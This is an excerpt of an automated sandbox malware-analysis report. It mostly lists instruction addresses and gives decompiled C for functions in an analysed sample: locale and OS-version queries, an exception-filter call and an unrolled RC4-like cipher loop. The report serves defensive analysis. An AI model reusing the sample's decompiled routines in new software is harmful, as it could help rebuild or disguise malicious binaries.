                                                                              0x00427b17
                                                                              0x00427b19
                                                                              0x00427b1d
                                                                              0x00427b21
                                                                              0x00427b24
                                                                              0x00427b27
                                                                              0x00427b2b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427b32
                                                                              0x00427b3a
                                                                              0x00427b3d
                                                                              0x00427b40
                                                                              0x00427b43
                                                                              0x00427b46
                                                                              0x00427b47
                                                                              0x00427b49
                                                                              0x00427b50
                                                                              0x00427b52
                                                                              0x00427b52
                                                                              0x00427b52
                                                                              0x00427b56
                                                                              0x00427b59
                                                                              0x00427b59
                                                                              0x00427b5d
                                                                              0x00427b60
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427b6d
                                                                              0x00427b70
                                                                              0x00427b72
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427b7c
                                                                              0x00427b7f
                                                                              0x00427b80
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427b93
                                                                              0x00427b94
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427b9c
                                                                              0x00427ba2
                                                                              0x00427ba3
                                                                              0x00427ba6
                                                                              0x00427ba6
                                                                              0x00427ba9
                                                                              0x00427ba9
                                                                              0x00427baa
                                                                              0x00427bae
                                                                              0x00427bae
                                                                              0x00427baf
                                                                              0x00427bb1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427bb8
                                                                              0x00427bba
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427bc1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427cd5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427bc9
                                                                              0x00427bcc
                                                                              0x00427bcc
                                                                              0x00427bcf
                                                                              0x00427bd0
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427bdc
                                                                              0x00427bdf
                                                                              0x00427be2
                                                                              0x00427be3
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427bed
                                                                              0x00427bee
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427a98
                                                                              0x00427cd6
                                                                              0x00427cd6
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427ccc
                                                                              0x00427cce
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427bfe
                                                                              0x00427c05
                                                                              0x00427c06
                                                                              0x00427c08
                                                                              0x00427c0b
                                                                              0x00427c0b
                                                                              0x00427c0b
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427c14
                                                                              0x00427c17
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427c22
                                                                              0x00427c25
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427c31
                                                                              0x00427c32
                                                                              0x00427c35
                                                                              0x00427c36
                                                                              0x00427c39
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427c40
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427c45
                                                                              0x00427c46
                                                                              0x00427c46
                                                                              0x00427c1c
                                                                              0x00427c1c
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427c52
                                                                              0x00427c53
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427c58
                                                                              0x00427c5b
                                                                              0x00427c5e
                                                                              0x00427c61
                                                                              0x00427c62
                                                                              0x00427c62
                                                                              0x00427c66
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427c6d
                                                                              0x00427c71
                                                                              0x00427bd4
                                                                              0x00427bd4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427c7e
                                                                              0x00427c81
                                                                              0x00427c83
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427c90
                                                                              0x00427c93
                                                                              0x00427c96
                                                                              0x00427c99
                                                                              0x00427c9c
                                                                              0x00427c9f
                                                                              0x00427cb0
                                                                              0x00427cb3
                                                                              0x00427cd9
                                                                              0x00427cd9
                                                                              0x00427cdb
                                                                              0x00000000
                                                                              0x00427cdb
                                                                              0x00427ca7
                                                                              0x00427ca8
                                                                              0x00427cab
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427ce2
                                                                              0x00427ce3
                                                                              0x00427ce3
                                                                              0x00427ce5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427d11
                                                                              0x00427d12
                                                                              0x00427d15
                                                                              0x00427d17
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427cb8
                                                                              0x00427cbb
                                                                              0x00427cbe
                                                                              0x00427cc1
                                                                              0x00427cc2
                                                                              0x00427cc2
                                                                              0x00427cc3
                                                                              0x00427cc3
                                                                              0x00427cc5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427cec
                                                                              0x00427cef
                                                                              0x00427cf0
                                                                              0x00427cf0
                                                                              0x00427cf3
                                                                              0x00427cf3
                                                                              0x00427cf4
                                                                              0x00427c0e
                                                                              0x00427c0e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427cfd
                                                                              0x00427d00
                                                                              0x00427d03
                                                                              0x00427d06
                                                                              0x00427d07
                                                                              0x00427d07
                                                                              0x00427d08
                                                                              0x00427d0b
                                                                              0x00427d0b
                                                                              0x00427d0d
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427d22
                                                                              0x00427d28
                                                                              0x00427d29
                                                                              0x00427d2a
                                                                              0x00427d2d
                                                                              0x00427d2d
                                                                              0x00427d30
                                                                              0x00427d31
                                                                              0x00427d35
                                                                              0x00427d36
                                                                              0x00427d38
                                                                              0x00427d3a
                                                                              0x00427d3d
                                                                              0x00427d3d
                                                                              0x00427d3f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427d46
                                                                              0x00427d48
                                                                              0x00427d4a
                                                                              0x00427d4c
                                                                              0x00427d4f
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427a69
                                                                              0x00427a69
                                                                              0x00427a69
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427a16
                                                                              0x00427a5f
                                                                              0x00427a5f
                                                                              0x00427a64
                                                                              0x00000000
                                                                              0x00427a64
                                                                              0x004279a3
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004279a5
                                                                              0x004279aa
                                                                              0x004279ad
                                                                              0x004279b4
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004279c1
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004279c3
                                                                              0x00427922
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042792a
                                                                              0x00427934
                                                                              0x0042793a
                                                                              0x00427944
                                                                              0x0042794a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427952
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427954
                                                                              0x00427962
                                                                              0x0042796a
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x0042796a
                                                                              0x00427942
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00427942
                                                                              0x00427932
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004278ff
                                                                              0x0042790a
                                                                              0x00427911
                                                                              0x00427d19
                                                                              0x00427d19
                                                                              0x00427d71
                                                                              0x00427d71
                                                                              0x00427d76
                                                                              0x00427d7b
                                                                              0x00427d7b
                                                                              0x00427d7f
                                                                              0x00427a6b
                                                                              0x00427a71
                                                                              0x00427a79
                                                                              0x00427a79
                                                                              0x00000000
                                                                              0x00427911
                                                                              0x004278fd
                                                                              0x004278bf
                                                                              0x004278c5
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x004278d0
                                                                              0x004278d1
                                                                              0x004278d2
                                                                              0x004278d7
                                                                              0x00000000
                                                                              0x004278d7
                                                                              0x0042789f
                                                                              0x004278a4
                                                                              0x004278af
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000

                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: H_prolog
                                                                              • String ID:
                                                                              • API String ID: 3519838083-0
                                                                              • Opcode ID: 89e73b85542621bb9927e41f1aa92a16eb06ccc9b6fe6ae87979f35d17821f88
                                                                              • Instruction ID: 438d015fb974bd6cfb24ed70320b7d8d1c6c310b45a2c61704f670ece8b283d2
                                                                              • Opcode Fuzzy Hash: 89e73b85542621bb9927e41f1aa92a16eb06ccc9b6fe6ae87979f35d17821f88
                                                                              • Instruction Fuzzy Hash: ABE18C70708235EBDF14DF65E880ABE7BA9EF04314FA0855BF8069A251C73DDA01DB69
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041AED4, Relevance: 1.5, APIs: 1, Instructions: 24COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E0041AED4(int _a4) {
				intOrPtr _v8;
				char _v10;
				char _v16;
				intOrPtr _t7;
				signed int _t9;
				signed int _t11;

				_t7 =  *0x457184; // 0xb7aa1229
				_v8 = _t7;
				_v10 = 0;
				_t9 = GetLocaleInfoA(_a4, 0x1004,  &_v16, 6);
				if(_t9 != 0) {
					_t11 = E00413BE0( &_v16);
				} else {
					_t11 = _t9 | 0xffffffff;
				}
				return E00412FBB(_t11, _v8);
			}









                                                                              0x0041aeda
                                                                              0x0041aee1
                                                                              0x0041aef0
                                                                              0x0041aef4
                                                                              0x0041aefc
                                                                              0x0041af07
                                                                              0x0041aefe
                                                                              0x0041aefe
                                                                              0x0041aefe
                                                                              0x0041af16

                                                                              APIs
                                                                              • GetLocaleInfoA.KERNEL32(?,00001004,00000100,00000006,00000100,?,00000000), ref: 0041AEF4
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: InfoLocale
                                                                              • String ID:
                                                                              • API String ID: 2299586839-0
                                                                              • Opcode ID: fee074237540e72aaeed99f63b0c3949fa03304191c868361bf5d72adda1f38e
                                                                              • Instruction ID: 1f5f0bb7610a60ee1eda59eab7a47054cef85c17d5fa8e7628b066b327002fc1
                                                                              • Opcode Fuzzy Hash: fee074237540e72aaeed99f63b0c3949fa03304191c868361bf5d72adda1f38e
                                                                              • Instruction Fuzzy Hash: 5DE09230A08208BBCB00DBA4DA06ACEB7B99B04318F0002A6FA11D61D1EAB4D654975A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00409088, Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00409088() {
				intOrPtr _v8;
				struct _OSVERSIONINFOA _v156;
				intOrPtr _t10;
				signed int _t18;

				_t10 =  *0x457184; // 0xb7aa1229
				_v8 = _t10;
				_t18 = 0x24;
				memset( &(_v156.dwMajorVersion), 0, _t18 << 2);
				_v156.dwOSVersionInfoSize = 0x94;
				GetVersionExA( &_v156);
				return E00412FBB(0 | _v156.dwPlatformId == 0x00000002, _v8);
			}







                                                                              0x00409091
                                                                              0x00409097
                                                                              0x0040909c
                                                                              0x004090a5
                                                                              0x004090ae
                                                                              0x004090b8
                                                                              0x004090d4

                                                                              APIs
                                                                              • GetVersionExA.KERNEL32(?), ref: 004090B8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: Version
                                                                              • String ID:
                                                                              • API String ID: 1889659487-0
                                                                              • Opcode ID: e918536e98948c16cfddc44df0fff2a599937eba6742cae129f23cdb5caf1d8c
                                                                              • Instruction ID: a1699b6297b9120fef7ac5244f9459e8e945229ea3eeed98c880eca149102dc8
                                                                              • Opcode Fuzzy Hash: e918536e98948c16cfddc44df0fff2a599937eba6742cae129f23cdb5caf1d8c
                                                                              • Instruction Fuzzy Hash: 0DE01272A00218AFDF60DB78DE45B8DF7F8AB49304F5084E5D50DE6292DE749A89CB44
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00416ECE, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetUnhandledExceptionFilter.KERNEL32 ref: 00416ED3
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.194088029.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.194081527.0000000000400000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194142270.0000000000432000.00000002.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194175419.0000000000456000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194181821.000000000045A000.00000004.00020000.sdmp Download File
                                                                              • Associated: 00000000.00000002.194191938.000000000045C000.00000002.00020000.sdmp Download File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_lK8vF3n2e7.jbxd
                                                                              Similarity
                                                                              • API ID: ExceptionFilterUnhandled
                                                                              • String ID:
                                                                              • API String ID: 3192549508-0
                                                                              • Opcode ID: c85cdadb5a86818a3bf3ad5f78d57f5a5955cfaacf40f022efb94927ee0ad7b2
                                                                              • Instruction ID: d7e3430354887e2d29a2e9847da39063828ce819dd7cffe85bbc2b730dbcf42c
                                                                              • Opcode Fuzzy Hash: c85cdadb5a86818a3bf3ad5f78d57f5a5955cfaacf40f022efb94927ee0ad7b2
                                                                              • Instruction Fuzzy Hash:
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00401117, Relevance: .4, Instructions: 395COMMONCrypto
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 100%
                                                                              			E00401117(signed int _a4, signed int _a8, signed int* _a12, signed char* _a16) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				unsigned int _t432;
				signed int _t434;
				signed int _t435;
				signed int _t436;
				signed int* _t527;
				signed int _t528;
				signed int _t530;
				intOrPtr _t531;
				signed int _t533;
				intOrPtr _t534;
				intOrPtr _t535;
				signed int _t540;
				intOrPtr _t541;
				signed int _t543;
				intOrPtr _t544;
				intOrPtr _t545;
				signed int _t550;
				intOrPtr _t551;
				signed int _t553;
				intOrPtr _t554;
				intOrPtr _t555;
				signed int _t560;
				intOrPtr _t561;
				signed int _t563;
				intOrPtr _t564;
				intOrPtr _t565;
				signed int _t570;
				intOrPtr _t571;
				signed int _t573;
				intOrPtr _t574;
				intOrPtr _t575;
				signed int _t580;
				intOrPtr _t581;
				signed int _t583;
				intOrPtr _t584;
				intOrPtr _t585;
				signed int _t590;
				intOrPtr _t591;
				signed int _t593;
				intOrPtr _t594;
				intOrPtr _t595;
				signed int _t599;
				intOrPtr _t600;
				signed int _t602;
				intOrPtr _t603;
				intOrPtr _t604;
				signed int _t609;
				intOrPtr _t610;
				signed int _t612;
				intOrPtr _t613;
				intOrPtr _t614;
				signed int _t619;
				intOrPtr _t620;
				signed int _t622;
				intOrPtr _t623;
				intOrPtr _t624;
				signed int _t629;
				intOrPtr _t630;
				signed int _t632;
				intOrPtr _t633;
				intOrPtr _t634;
				signed int _t639;
				intOrPtr _t640;
				signed int _t642;
				intOrPtr _t643;
				intOrPtr _t644;
				signed int _t649;
				intOrPtr _t650;
				signed int _t652;
				intOrPtr _t653;
				intOrPtr _t654;
				signed int _t659;
				intOrPtr _t660;
				signed int _t662;
				intOrPtr _t663;
				intOrPtr _t664;
				signed int _t669;
				intOrPtr _t670;
				signed int _t672;
				intOrPtr _t673;
				intOrPtr _t674;
				signed char _t676;
				signed int* _t677;
				signed char* _t678;

				_t527 = _a4;
				_t528 =  *_t527;
				_t435 = _a8;
				_a4 = _t527[1];
				_t678 = _a16;
				_t432 = _t435 >> 3;
				_t677 = _a12;
				_v20 = _t432;
				if(_t432 != 0) {
					do {
						_t599 = _t528 + 0x00000001 & 0x000000ff;
						_v8 = _t599;
						_t600 =  *((intOrPtr*)(_t527 + 8 + _t599 * 4));
						_v12 = _t600;
						_t602 = _t600 + _a4 & 0x000000ff;
						_a4 = _t602;
						_t603 =  *((intOrPtr*)(_t527 + 8 + _t602 * 4));
						 *((intOrPtr*)(_t527 + 8 + _v8 * 4)) = _t603;
						_v16 = _t603;
						_t604 = _v12;
						 *((intOrPtr*)(_t527 + 8 + _a4 * 4)) = _t604;
						 *_t678 =  *(_t527 + 8 + (_v16 + _t604 & 0x000000ff) * 4) ^  *_t677;
						_t609 = _v8 + 0x00000001 & 0x000000ff;
						_v8 = _t609;
						_t610 =  *((intOrPtr*)(_t527 + 8 + _t609 * 4));
						_v12 = _t610;
						_t612 = _t610 + _a4 & 0x000000ff;
						_a4 = _t612;
						_t613 =  *((intOrPtr*)(_t527 + 8 + _t612 * 4));
						 *((intOrPtr*)(_t527 + 8 + _v8 * 4)) = _t613;
						_v16 = _t613;
						_t614 = _v12;
						 *((intOrPtr*)(_t527 + 8 + _a4 * 4)) = _t614;
						_t678[1] =  *(_t527 + 8 + (_v16 + _t614 & 0x000000ff) * 4) ^ _t677[0];
						_t619 = _v8 + 0x00000001 & 0x000000ff;
						_v8 = _t619;
						_t620 =  *((intOrPtr*)(_t527 + 8 + _t619 * 4));
						_v12 = _t620;
						_t622 = _t620 + _a4 & 0x000000ff;
						_a4 = _t622;
						_t623 =  *((intOrPtr*)(_t527 + 8 + _t622 * 4));
						 *((intOrPtr*)(_t527 + 8 + _v8 * 4)) = _t623;
						_v16 = _t623;
						_t624 = _v12;
						 *((intOrPtr*)(_t527 + 8 + _a4 * 4)) = _t624;
						_t678[2] =  *(_t527 + 8 + (_v16 + _t624 & 0x000000ff) * 4) ^ _t677[0];
						_t629 = _v8 + 0x00000001 & 0x000000ff;
						_v8 = _t629;
						_t630 =  *((intOrPtr*)(_t527 + 8 + _t629 * 4));
						_v12 = _t630;
						_t632 = _t630 + _a4 & 0x000000ff;
						_a4 = _t632;
						_t633 =  *((intOrPtr*)(_t527 + 8 + _t632 * 4));
						_v16 = _t633;
						 *((intOrPtr*)(_t527 + 8 + _v8 * 4)) = _t633;
						_t634 = _v12;
						 *((intOrPtr*)(_t527 + 8 + _a4 * 4)) = _t634;
						_t678[3] =  *(_t527 + 8 + (_v16 + _t634 & 0x000000ff) * 4) ^ _t677[0];
						_t639 = _v8 + 0x00000001 & 0x000000ff;
						_v8 = _t639;
						_t640 =  *((intOrPtr*)(_t527 + 8 + _t639 * 4));
						_v12 = _t640;
						_t642 = _t640 + _a4 & 0x000000ff;
						_a4 = _t642;
						_t643 =  *((intOrPtr*)(_t527 + 8 + _t642 * 4));
						 *((intOrPtr*)(_t527 + 8 + _v8 * 4)) = _t643;
						_v16 = _t643;
						_t644 = _v12;
						 *((intOrPtr*)(_t527 + 8 + _a4 * 4)) = _t644;
						_t678[4] =  *(_t527 + 8 + (_v16 + _t644 & 0x000000ff) * 4) ^ _t677[1];
						_t649 = _v8 + 0x00000001 & 0x000000ff;
						_v8 = _t649;
						_t650 =  *((intOrPtr*)(_t527 + 8 + _t649 * 4));
						_v12 = _t650;
						_t652 = _t650 + _a4 & 0x000000ff;
						_a4 = _t652;
						_t653 =  *((intOrPtr*)(_t527 + 8 + _t652 * 4));
						 *((intOrPtr*)(_t527 + 8 + _v8 * 4)) = _t653;
						_v16 = _t653;
						_t654 = _v12;
						 *((intOrPtr*)(_t527 + 8 + _a4 * 4)) = _t654;
						_t678[5] =  *(_t527 + 8 + (_v16 + _t654 & 0x000000ff) * 4) ^ _t677[1];
						_t659 = _v8 + 0x00000001 & 0x000000ff;
						_v8 = _t659;
						_t660 =  *((intOrPtr*)(_t527 + 8 + _t659 * 4));
						_v12 = _t660;
						_t662 = _t660 + _a4 & 0x000000ff;
						_a4 = _t662;
						_t663 =  *((intOrPtr*)(_t527 + 8 + _t662 * 4));
						 *((intOrPtr*)(_t527 + 8 + _v8 * 4)) = _t663;
						_v16 = _t663;
						_t664 = _v12;
						 *((intOrPtr*)(_t527 + 8 + _a4 * 4)) = _t664;
						_t678[6] =  *(_t527 + 8 + (_v16 + _t664 & 0x000000ff) * 4) ^ _t677[1];
						_t669 = _v8 + 0x00000001 & 0x000000ff;
						_v8 = _t669;
						_t670 =  *((intOrPtr*)(_t527 + 8 + _t669 * 4));
						_v12 = _t670;
						_t672 = _t670 + _a4 & 0x000000ff;
						_a4 = _t672;
						_t673 =  *((intOrPtr*)(_t527 + 8 + _t672 * 4));
						 *((intOrPtr*)(_t527 + 8 + _v8 * 4)) = _t673;
						_v16 = _t673;
						_t674 = _v12;
						 *((intOrPtr*)(_t527 + 8 + _a4 * 4)) = _t674;
						_t676 =  *(_t527 + 8 + (_v16 + _t674 & 0x000000ff) * 4) ^ _t677[1];
						_t677 =  &(_t677[2]);
						_t678[7] = _t676;
						_t528 = _v8;
						_t678 =  &(_t678[8]);
						_t222 =  &_v20;
						 *_t222 = _v20 - 1;
					} while ( *_t222 != 0);
					_t435 = _a8;
				}
				_t436 = _t435 & 0x00000007;
				_v20 = _t436;
				if(_t436 != 0) {
					while(1) {
						_t530 = _t528 + 0x00000001 & 0x000000ff;
						_v8 = _t530;
						_t531 =  *((intOrPtr*)(_t527 + 8 + _t530 * 4));
						_v12 = _t531;
						_t533 = _t531 + _a4 & 0x000000ff;
						_a4 = _t533;
						_t534 =  *((intOrPtr*)(_t527 + 8 + _t533 * 4));
						 *((intOrPtr*)(_t527 + 8 + _v8 * 4)) = _t534;
						_v16 = _t534;
						_t535 = _v12;
						 *((intOrPtr*)(_t527 + 8 + _a4 * 4)) = _t535;
						_t425 =  &_v20;
						 *_t425 = _v20 - 1;
						 *_t678 =  *(_t527 + 8 + (_v16 + _t535 & 0x000000ff) * 4) ^  *_t677;
						if( *_t425 == 0) {
							break;
						}
						_t540 = _v8 + 0x00000001 & 0x000000ff;
						_v8 = _t540;
						_t541 =  *((intOrPtr*)(_t527 + 8 + _t540 * 4));
						_v12 = _t541;
						_t543 = _t541 + _a4 & 0x000000ff;
						_a4 = _t543;
						_t544 =  *((intOrPtr*)(_t527 + 8 + _t543 * 4));
						 *((intOrPtr*)(_t527 + 8 + _v8 * 4)) = _t544;
						_v16 = _t544;
						_t545 = _v12;
						 *((intOrPtr*)(_t527 + 8 + _a4 * 4)) = _t545;
						_t252 =  &_v20;
						 *_t252 = _v20 - 1;
						_t678[1] =  *(_t527 + 8 + (_v16 + _t545 & 0x000000ff) * 4) ^ _t677[0];
						if( *_t252 != 0) {
							_t550 = _v8 + 0x00000001 & 0x000000ff;
							_v8 = _t550;
							_t551 =  *((intOrPtr*)(_t527 + 8 + _t550 * 4));
							_v12 = _t551;
							_t553 = _t551 + _a4 & 0x000000ff;
							_a4 = _t553;
							_t554 =  *((intOrPtr*)(_t527 + 8 + _t553 * 4));
							 *((intOrPtr*)(_t527 + 8 + _v8 * 4)) = _t554;
							_v16 = _t554;
							_t555 = _v12;
							 *((intOrPtr*)(_t527 + 8 + _a4 * 4)) = _t555;
							_t281 =  &_v20;
							 *_t281 = _v20 - 1;
							_t678[2] =  *(_t527 + 8 + (_v16 + _t555 & 0x000000ff) * 4) ^ _t677[0];
							if( *_t281 != 0) {
								_t560 = _v8 + 0x00000001 & 0x000000ff;
								_v8 = _t560;
								_t561 =  *((intOrPtr*)(_t527 + 8 + _t560 * 4));
								_v12 = _t561;
								_t563 = _t561 + _a4 & 0x000000ff;
								_a4 = _t563;
								_t564 =  *((intOrPtr*)(_t527 + 8 + _t563 * 4));
								 *((intOrPtr*)(_t527 + 8 + _v8 * 4)) = _t564;
								_v16 = _t564;
								_t565 = _v12;
								 *((intOrPtr*)(_t527 + 8 + _a4 * 4)) = _t565;
								_t310 =  &_v20;
								 *_t310 = _v20 - 1;
								_t678[3] =  *(_t527 + 8 + (_v16 + _t565 & 0x000000ff) * 4) ^ _t677[0];
								if( *_t310 != 0) {
									_t570 = _v8 + 0x00000001 & 0x000000ff;
									_v8 = _t570;
									_t571 =  *((intOrPtr*)(_t527 + 8 + _t570 * 4));
									_v12 = _t571;
									_t573 = _t571 + _a4 & 0x000000ff;
									_a4 = _t573;
									_t574 =  *((intOrPtr*)(_t527 + 8 + _t573 * 4));
									 *((intOrPtr*)(_t527 + 8 + _v8 * 4)) = _t574;
									_v16 = _t574;
									_t575 = _v12;
									 *((intOrPtr*)(_t527 + 8 + _a4 * 4)) = _t575;
									_t339 =  &_v20;
									 *_t339 = _v20 - 1;
									_t678[4] =  *(_t527 + 8 + (_v16 + _t575 & 0x000000ff) * 4) ^ _t677[1];
									if( *_t339 != 0) {
										_t580 = _v8 + 0x00000001 & 0x000000ff;
										_v8 = _t580;
										_t581 =  *((intOrPtr*)(_t527 + 8 + _t580 * 4));
										_v12 = _t581;
										_t583 = _t581 + _a4 & 0x000000ff;
										_a4 = _t583;
										_t584 =  *((intOrPtr*)(_t527 + 8 + _t583 * 4));
										 *((intOrPtr*)(_t527 + 8 + _v8 * 4)) = _t584;
										_v16 = _t584;
										_t585 = _v12;
										 *((intOrPtr*)(_t527 + 8 + _a4 * 4)) = _t585;
										_t368 =  &_v20;
										 *_t368 = _v20 - 1;
										_t678[5] =  *(_t527 + 8 + (_v16 + _t585 & 0x000000ff) * 4) ^ _t677[1];
										if( *_t368 != 0) {
											_t590 = _v8 + 0x00000001 & 0x000000ff;
											_v8 = _t590;
											_t591 =  *((intOrPtr*)(_t527 + 8 + _t590 * 4));
											_v12 = _t591;
											_t593 = _t591 + _a4 & 0x000000ff;
											_a4 = _t593;
											_t594 =  *((intOrPtr*)(_t527 + 8 + _t593 * 4));
											 *((intOrPtr*)(_t527 + 8 + _v8 * 4)) = _t594;
											_v16 = _t594;
											_t595 = _v12;
											 *((intOrPtr*)(_t527 + 8 + _a4 * 4)) = _t595;
											_t397 =  &_v20;
											 *_t397 = _v20 - 1;
											_t678[6] =  *(_t527 + 8 + (_v16 + _t595 & 0x000000ff) * 4) ^ _t677[1];
											if( *_t397 != 0) {
												_t528 = _v8;
												continue;
											}
										}
									}
								}
							}
						}
						break;
					}
					_t528 = _v8;
				}
				_t434 = _a4;
				 *_t527 = _t528;
				_t527[1] = _t434;
				return _t434;
			}



























































































                                                                              0x0040111d
                                                                              0x00401123
                                                                              0x00401126
                                                                              0x00401129
                                                                              0x0040112f
                                                                              0x00401132
                                                                              0x00401136
                                                                              0x00401139
                                                                              0x00401141
                                                                              0x00401147
                                                                              0x00401148
                                                                              0x0040114a
                                                                              0x0040114d
                                                                              0x00401154
                                                                              0x0040115c
                                                                              0x0040115e
                                                                              0x00401161
                                                                              0x00401165
                                                                              0x0040116c
                                                                              0x0040116f
                                                                              0x00401172
                                                                              0x00401186
                                                                              0x0040118c
                                                                              0x0040118e
                                                                              0x00401191
                                                                              0x00401195
                                                                              0x0040119d
                                                                              0x0040119f
                                                                              0x004011a2
                                                                              0x004011a6
                                                                              0x004011ad
                                                                              0x004011b0
                                                                              0x004011b3
                                                                              0x004011c8
                                                                              0x004011cf
                                                                              0x004011d1
                                                                              0x004011d4
                                                                              0x004011d8
                                                                              0x004011e0
                                                                              0x004011e2
                                                                              0x004011e5
                                                                              0x004011e9
                                                                              0x004011f0
                                                                              0x004011f3
                                                                              0x004011f6
                                                                              0x0040120b
                                                                              0x00401212
                                                                              0x00401214
                                                                              0x00401217
                                                                              0x0040121b
                                                                              0x00401223
                                                                              0x00401225
                                                                              0x00401228
                                                                              0x0040122c
                                                                              0x0040122f
                                                                              0x00401233
                                                                              0x00401239
                                                                              0x0040124e
                                                                              0x00401255
                                                                              0x00401257
                                                                              0x0040125a
                                                                              0x0040125e
                                                                              0x00401266
                                                                              0x00401268
                                                                              0x0040126b
                                                                              0x0040126f
                                                                              0x00401276
                                                                              0x00401279
                                                                              0x0040127c
                                                                              0x00401291
                                                                              0x00401298
                                                                              0x0040129a
                                                                              0x0040129d
                                                                              0x004012a1
                                                                              0x004012a9
                                                                              0x004012ab
                                                                              0x004012ae
